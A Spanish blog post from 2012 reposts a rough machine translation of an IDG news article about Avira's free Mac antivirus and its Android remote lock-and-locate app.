domingo, 1 de abril de 2012

Avira

Saludos Mundo Libre.

He leido un articulo sobre Avira que sea combertido en la Probeedora de antivirus para mac.

Avira se convierte en proveedor para ofrecer las últimas Mac software antivirus
La compañía también lanzó una aplicación gratuita de gestión remota para los teléfonos Android

. ¿Qué es esto?

La compañía de seguridad alemana Avira ha lanzado un software antivirus gratuito para Mac de Apple, junto con una variedad de proveedores de software de seguridad que ofrece protección para OS X.

30.000 blogs de WordPress infectadas para distribuir Rogue software antivirus

Avira dijo que la cuota de mercado de Apple para los ordenadores ha aumentado, lo que ha sido seguido por un aumento en los programas de software maliciosos. La compañía dijo que el producto no contiene publicidad o de marketing anuncios pop-up.

Muchas de las primeras empresas de software de seguridad ofrecen software de seguridad para Mac, con un poco de forma gratuita. Kaspersky Lab, Intego, PC Tools, Symantec, McAfee y Trend Micro ofrecen todos pagan el software de seguridad, mientras que Sophos ofrece su producto Mac de forma gratuita.

Apple se comercializa como inherentemente más seguro que Windows. Los expertos en seguridad han dicho que su plataforma es tan propenso a vulnerabilidades de software como sistemas operativos, pero Windows se dirige más debido a su elevada cuota de mercado. En una señal de la creciente prevalencia de Mac malware, Apple lanzó una herramienta antimalware llamada XProtect en 2009, que se actualiza periódicamente para detectar malware nuevo.

Avira también lanzó una aplicación para los teléfonos Android de forma remota que puede bloquear o localizar un dispositivo, así como borrar sus datos. Usando una interfaz basada en web, el dueño del teléfono puede mostrar un "propietario llamada" mensaje en el dispositivo con un número.

Un dispositivo que falta para Android se pueden trazar en Google Maps. También se puede mandar a hacer un sonido fuerte durante 20 segundos, Avira, dijo. Hasta cinco teléfonos se pueden gestionar de forma remota. La aplicación es gratuita y funciona con Android 2.2, conocida como Froyo, y 2.3, apodado Gingerbread.




Por Jeremy Kirk, IDG News Service


Fuente:http://www.networkworld.com/news/2012/032812-avira-becomes-latest-vendor-to-257715.html?source=nww_rss


Traduccion: Dellcom1@